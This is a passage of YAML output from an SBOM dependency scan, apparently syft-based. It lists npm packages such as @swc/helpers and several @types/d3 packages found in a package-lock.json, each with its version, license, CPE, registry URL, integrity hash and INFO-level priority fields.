[] tags: - sbom - package raw: id: f2d04f064acf1b61 name: '@swc/helpers' version: 0.5.21 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@swc\/helpers:\@swc\/helpers:0.5.21:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40swc/helpers@0.5.21 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.21.tgz integrity: sha512-jI/VAmtdjB/RnI8GTnokyX7Ug8c+g+ffD6QRLa6XQewtnGyukKkKSk3wLTM3b5cjt1jNh9x0jfVlagdN2gDKQg== dependencies: tslib: ^2.8.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ec0bf772439a91e3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @swc/helpers 0.5.5' title: '@swc/helpers 0.5.5' description: 'Package discovered: @swc/helpers 0.5.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 72bc47189d44cca0 name: '@swc/helpers' version: 0.5.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@swc\/helpers:\@swc\/helpers:0.5.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40swc/helpers@0.5.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.5.tgz integrity: sha512-KGYxvIOXcceOAbEk4bi/dVLEK9z8sZ0uBB3Il5b1rhfClSpcX0yfRO0KmTkqR2cnQDymwLB+25ZyMzICg/cm/A== dependencies: '@swc/counter': ^0.1.3 tslib: ^2.4.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 19698700a5d5ff08 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @tootallnate/once 2.0.0' title: '@tootallnate/once 2.0.0' description: 'Package discovered: @tootallnate/once 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a7bdaefe075a54be name: '@tootallnate/once' version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@tootallnate\/once:\@tootallnate\/once:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40tootallnate/once@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz integrity: sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 80bf92167036230d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/caseless 0.12.5' title: '@types/caseless 0.12.5' description: 'Package discovered: @types/caseless 0.12.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7578f19b88adc968 name: '@types/caseless' version: 0.12.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/caseless:\@types\/caseless:0.12.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/caseless@0.12.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz integrity: sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a5c07d1028c25891 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/cors 2.8.19' title: '@types/cors 2.8.19' description: 'Package discovered: @types/cors 2.8.19' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8b6775e086bda391 name: '@types/cors' version: 2.8.19 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/cors:\@types\/cors:2.8.19:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/cors@2.8.19 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/cors/-/cors-2.8.19.tgz integrity: sha512-mFNylyeyqN93lfe/9CSxOGREz8cpzAhH+E93xJ4xWQf62V8sQ/24reV2nyzUWM6H6Xji+GGHpkbLe7pVoUEskg== dependencies: '@types/node': '*' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d3e89ddbd967f67d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/d3-array 3.2.2' title: '@types/d3-array 3.2.2' description: 'Package discovered: @types/d3-array 3.2.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 59c0361f7de521dd name: '@types/d3-array' version: 3.2.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/d3-array:\@types\/d3-array:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3-array:\@types\/d3_array:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_array:\@types\/d3-array:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_array:\@types\/d3_array:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-array:3.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_array:3.2.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/d3-array@3.2.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/d3-array/-/d3-array-3.2.2.tgz integrity: sha512-hOLWVbm7uRza0BYXpIIW5pxfrKe0W+D5lrFiAEYR+pb6w3N2SwSMaJbXdUfSEv+dT4MfHBLtn5js0LAWaO6otw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4a5d6407d36c3dfe ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/d3-color 3.1.3' title: '@types/d3-color 3.1.3' description: 'Package discovered: @types/d3-color 3.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ad88e8187765d8aa name: '@types/d3-color' version: 3.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/d3-color:\@types\/d3-color:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3-color:\@types\/d3_color:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_color:\@types\/d3-color:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_color:\@types\/d3_color:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-color:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_color:3.1.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/d3-color@3.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/d3-color/-/d3-color-3.1.3.tgz integrity: sha512-iO90scth9WAbmgv7ogoq57O9YpKmFBbmoEoCHDB2xMBY0+/KVrqAaCDyCE16dUspeOvIxFFRI+0sEtqDqy2b4A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 075de1dd01220805 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/d3-ease 3.0.2' title: '@types/d3-ease 3.0.2' description: 'Package discovered: @types/d3-ease 3.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: df6234ea1d1790c8 name: '@types/d3-ease' version: 3.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/d3-ease:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3-ease:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_ease:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_ease:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/d3-ease@3.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/d3-ease/-/d3-ease-3.0.2.tgz integrity: sha512-NcV1JjO5oDzoK26oMzbILE6HW7uVXOHLQvHshBUW4UMdZGfiY6v5BeQwh9a9tCzv+CeefZQHJt5SRgK154RtiA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ac33d3528c07735d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/d3-interpolate 3.0.4' title: '@types/d3-interpolate 3.0.4' description: 'Package discovered: @types/d3-interpolate 3.0.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d2cfc65d37d7fda7 name: '@types/d3-interpolate' version: 3.0.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/d3-interpolate:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3-interpolate:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_interpolate:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_interpolate:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/d3-interpolate@3.0.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/d3-interpolate/-/d3-interpolate-3.0.4.tgz integrity: sha512-mgLPETlrpVV1YRJIglr4Ez47g7Yxjl1lj7YKsiMCb27VJH9W8NVM6Bb9d8kkpG/uAQS5AmbA48q2IAolKKo1MA== dependencies: '@types/d3-color': '*' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9ef37f1ec9a73980 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/d3-path 3.1.1' title: '@types/d3-path 3.1.1' description: 'Package discovered: @types/d3-path 3.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0128eed2457b60d1 name: '@types/d3-path' version: 3.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/d3-path:\@types\/d3-path:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3-path:\@types\/d3_path:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_path:\@types\/d3-path:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_path:\@types\/d3_path:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-path:3.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_path:3.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/d3-path@3.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/d3-path/-/d3-path-3.1.1.tgz integrity: sha512-VMZBYyQvbGmWyWVea0EHs/BwLgxc+MKi1zLDCONksozI4YJMcTt8ZEuIR4Sb1MMTE8MMW49v0IwI5+b7RmfWlg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b363e223fe02334b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/d3-scale 4.0.9' title: '@types/d3-scale 4.0.9' description: 'Package discovered: @types/d3-scale 4.0.9' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6f0b81bc9d69ce92 name: '@types/d3-scale' version: 4.0.9 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/d3-scale:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3-scale:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_scale:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_scale:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/d3-scale@4.0.9 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/d3-scale/-/d3-scale-4.0.9.tgz integrity: sha512-dLmtwB8zkAeO/juAMfnV+sItKjlsw2lKdZVVy6LRr0cBmegxSABiLEpGVmSJJ8O08i4+sGR6qQtb6WtuwJdvVw== dependencies: '@types/d3-time': '*' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 22226a3e628ac76c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/d3-shape 3.1.8' title: '@types/d3-shape 3.1.8' description: 'Package discovered: @types/d3-shape 3.1.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 533995aeaf2ae857 name: '@types/d3-shape' version: 3.1.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/d3-shape:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3-shape:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_shape:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_shape:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/d3-shape@3.1.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/d3-shape/-/d3-shape-3.1.8.tgz integrity: sha512-lae0iWfcDeR7qt7rA88BNiqdvPS5pFVPpo5OfjElwNaT2yyekbM0C9vK+yqBqEmHr6lDkRnYNoTBYlAgJa7a4w== dependencies: '@types/d3-path': '*' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e91025b60bc33c45 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/d3-time 3.0.4' title: '@types/d3-time 3.0.4' description: 'Package discovered: @types/d3-time 3.0.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d051a01827d6eb95 name: '@types/d3-time' version: 3.0.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/d3-time:\@types\/d3-time:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3-time:\@types\/d3_time:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_time:\@types\/d3-time:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_time:\@types\/d3_time:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-time:3.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_time:3.0.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/d3-time@3.0.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/d3-time/-/d3-time-3.0.4.tgz integrity: sha512-yuzZug1nkAAaBlBBikKZTgzCeA+k1uy4ZFwWANOfKw5z5LRhV0gNA7gNkKm7HoK+HRN0wX3EkxGk0fpbWhmB7g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 83378a6b374bc40d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/d3-timer 3.0.2' title: '@types/d3-timer 3.0.2' description: 'Package discovered: @types/d3-timer 3.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a9187c78265f1b66 name: '@types/d3-timer' version: 3.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/d3-timer:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3-timer:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_timer:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3_timer:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-timer:3.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_timer:3.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/d3-timer@3.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/d3-timer/-/d3-timer-3.0.2.tgz integrity: sha512-Ps3T8E8dZDam6fUyNiMkekK3XUsaUEik+idO9/YjPtfj2qruF8tFBXS7XhtE4iIXBLxhmLjP3SXpLhVf21I9Lw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4a3de97ef48e263d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/jsonwebtoken 9.0.10' title: '@types/jsonwebtoken 9.0.10' description: 'Package discovered: @types/jsonwebtoken 9.0.10' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bbe9092f97742247 name: '@types/jsonwebtoken' version: 9.0.10 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/jsonwebtoken:\@types\/jsonwebtoken:9.0.10:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/jsonwebtoken@9.0.10 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/jsonwebtoken/-/jsonwebtoken-9.0.10.tgz integrity: sha512-asx5hIG9Qmf/1oStypjanR7iKTv0gXQ1Ov/jfrX6kS/EO0OFni8orbmGCn0672NHR3kXHwpAwR+B368ZGN/2rA== dependencies: '@types/ms': '*' '@types/node': '*' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: be245f9788db1459 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/long 4.0.2' title: '@types/long 4.0.2' description: 'Package discovered: @types/long 4.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 69a126982af5137d name: '@types/long' version: 4.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/long:\@types\/long:4.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40types/long@4.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@types/long/-/long-4.0.2.tgz integrity: sha512-MqTGEo5bj5t157U6fA/BiDynNkn0YknVdh48CMPkTSpFTVmvao5UQmm7uEF6xBEo7qIMAlY/JSleYaE6VOdpaA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b5bebd78899827a5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @types/ms 2.1.0' title: '@types/ms 2.1.0' description: 'Package discovered: @types/ms 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fa54533e742eac71 name: '@types/ms' version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@types\/ms:\@types\/ms:2.1.0:*:*:*:*:*:*:* source: 